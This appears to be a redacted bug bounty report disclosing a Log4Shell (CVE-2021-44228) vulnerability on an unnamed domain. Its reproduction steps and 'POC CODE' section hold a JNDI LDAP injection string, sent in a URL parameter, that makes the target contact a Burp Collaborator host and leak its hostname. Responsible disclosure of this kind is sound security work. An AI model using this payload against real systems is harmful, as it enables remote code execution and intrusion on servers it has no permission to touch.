Hi team,
log4 shell is recent 0-day exploit it’s Java package vulnerable. ██████████ domain is vulnerable
Impact
RCE
System Host(s)
█████████
Affected Product(s) and Version(s)
CVE Numbers
CVE-2021-44228
Steps to Reproduce
- Go to this url => https://███████/██████=%24{jndi%3Aldap%3A%2F%2Fx%24{hostName}.LOG45200SSRF.xxxxxx.burpcollaborator.net%2Fa}
- paste the poc code on ██████ url parameter
- like this => https://██████████/██████
- then burp collaborator received reverse ping back
- I attached poc videos and photos below
##POC CODE
${jndi:ldap://x${hostName}.log4j.xxxxxxx.burpcollaborator.net/a}
Suggested Mitigation/Remediation Actions
https://www.lunasec.io/docs/blog/log4j-zero-day/